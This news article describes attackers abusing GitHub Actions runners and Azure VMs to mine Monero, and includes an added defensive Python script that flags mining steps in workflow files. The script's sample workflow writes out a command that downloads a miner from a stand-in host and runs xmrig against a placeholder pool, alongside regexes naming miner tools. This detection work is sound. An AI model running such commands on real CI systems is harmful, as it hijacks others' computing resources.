The abuse of GitHub Actions and Azure virtual machines (VMs) for cloud-based cryptocurrency mining shows that malicious actors are continuing to target cloud resources for use in illicit activities.
According to Trend Micro researcher Magno Logan, writing in a report published the week before last, "Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to gain profit easily."
GitHub Actions (GHAs) is GitHub's continuous integration and continuous delivery (CI/CD) platform; it lets users automate the software build, test, and deployment pipeline. With it, developers can create workflows that build and test every pull request to a code repository, or that deploy merged pull requests to production.
The Linux and Windows runners are both housed on Azure's Standard DS2 v2 virtual machines, which each have two virtual CPUs and seven gigabytes of memory available to them.
The Japanese company said it found over 1,000 repositories and over 550 code samples that abuse the runners provided by GitHub to mine cryptocurrency. The problem has been reported to the Microsoft-owned code-hosting service.
In addition to this, 11 different repositories were discovered to be hosting variants of a YAML script that contained commands to mine Monero coins. Each of these scripts relied on the same wallet, which suggests that it is either the work of a single person or a group of people working together.
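As an added, defender-side example (not code from the article or from Trend Micro's report): a small Python triage script that extracts the `run:` commands from GitHub Actions workflow files and flags any that reference miner binaries, stratum pool URLs, or Monero-style wallet addresses. It also groups workflows by the wallet they carry, so the "same wallet across many repositories" pattern described above stands out when scanning a set of repositories. The indicator patterns, the sample workflow, the hostnames and the wallet string are all constructed for illustration; none of them are indicators taken from the report.

```python
"""Triage GitHub Actions workflow files for cryptomining indicators.

Added example for a defender reviewing CI configuration; it is not code from
Trend Micro or the article. Pure standard library so it runs anywhere.
"""
import re
from typing import Dict, List

# Generic patterns a reviewer would look for in a workflow's shell commands.
# These are illustrative, not IoCs from the report.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "miner_binary": re.compile(r"\b(?:xmrig|minerd|cpuminer|xmr-stak)\b", re.I),
    "stratum_pool": re.compile(r"stratum\+(?:tcp|ssl)://", re.I),
    # Standard Monero addresses are 95 base58 characters starting with '4'
    # (subaddresses start with '8').
    "monero_wallet": re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b"),
    "miner_cli_flags": re.compile(r"--(?:donate-level|cpu-max-threads-hint)\b", re.I),
}

_RUN_KEY = re.compile(r"^\s*(?:-\s+)?run:\s*(.*)$")


def extract_run_commands(workflow_text: str) -> List[Dict]:
    """Return the command text of every `run:` step with its 1-based line number.

    Handles inline values (`run: make test`) and YAML block scalars
    (`run: |` / `run: >`), whose body is every following line indented
    deeper than the `run:` key.
    """
    lines = workflow_text.splitlines()
    commands: List[Dict] = []
    i = 0
    while i < len(lines):
        m = _RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        line_no = i + 1
        value = m.group(1).strip()
        if value in ("|", ">", "|-", ">-", "|+", ">+"):
            key_col = lines[i].index("run:")
            body: List[str] = []
            j = i + 1
            while j < len(lines):
                ln = lines[j]
                indent = len(ln) - len(ln.lstrip(" "))
                if ln.strip() == "" or indent > key_col:
                    if ln.strip():
                        body.append(ln.strip())
                    j += 1
                else:
                    break
            commands.append({"line": line_no, "command": "\n".join(body)})
            i = j
        else:
            commands.append({"line": line_no, "command": value})
            i += 1
    return commands


def scan_workflow(workflow_text: str) -> List[Dict]:
    """Flag run steps whose commands match any mining indicator."""
    findings = []
    for cmd in extract_run_commands(workflow_text):
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd["command"]))
        if hits:
            findings.append({"line": cmd["line"], "indicators": hits, "command": cmd["command"]})
    return findings


def shared_wallets(workflows: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each wallet address found to the (sorted) repos whose workflows use it."""
    by_wallet: Dict[str, set] = {}
    for repo, text in workflows.items():
        for wallet in INDICATORS["monero_wallet"].findall(text):
            by_wallet.setdefault(wallet, set()).add(repo)
    return {w: sorted(r) for w, r in by_wallet.items()}


# Constructed placeholder with the right shape (95 base58 chars); not a real wallet.
FAKE_WALLET = "4" + "A" * 94

# Constructed sample workflow: one benign step and one mining step.
SAMPLE_WORKFLOW = f"""\
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run tests
        run: make test
      - name: Suspicious step
        run: |
          curl -sSL https://downloads.example.invalid/miner.tgz | tar xz
          ./xmrig -o stratum+tcp://pool.example.invalid:3333 -u {FAKE_WALLET}
"""

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {f['line']}: {', '.join(f['indicators'])}")
    print(shared_wallets({"org/repo-a": SAMPLE_WORKFLOW, "org/repo-b": SAMPLE_WORKFLOW}))
```

Run it against the `.github/workflows/*.yml` files of the repositories you are auditing; a wallet that `shared_wallets` maps to many otherwise unrelated repositories is the clustering signal Trend Micro used to tie the eleven repositories together.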
"End users shouldn't have any reason to worry as long as the malicious actors only use their own accounts and repositories," said Logan. "[T]here is no reason for end users to be concerned." When these GHAs are shared on GitHub Marketplace or when they are used as a dependency for other Actions, problems can arise.
Cryptojacking-focused groups are known to infiltrate cloud deployments by exploiting a security flaw within the target systems themselves. These security flaws can take the form of an unpatched vulnerability, weak credentials, or a cloud implementation that has been improperly configured.
8220, Keksec (also known as Kek Security), Kinsing, Outlaw, and TeamTNT are some of the most notable actors operating in the underground cryptocurrency mining industry today.
The malware toolset is also characterized by kill scripts that terminate and delete competing cryptocurrency miners, so that the intruders get as much of the cloud system's capacity as possible for themselves. Trend Micro describes this as a battle "fought for control of the victim's resources."
That said, beyond the infrastructure and energy costs they impose, deployed cryptominers are also a barometer of poor security hygiene: the same initial access gained through a cloud misconfiguration can be weaponized by threat actors for far more damaging goals such as data exfiltration or ransomware.
In a previous report, the company noted that "one unique aspect [...] is that malicious actor groups do not only have to deal with a target organization's security systems and staff, but they also have to compete with one another for limited resources."
"The struggle to seize and maintain control over a victim's servers is a major driving force in the evolution of these groups' tools and techniques, prompting them to constantly improve their ability to remove competitors from compromised systems and, at the same time, resist being removed themselves."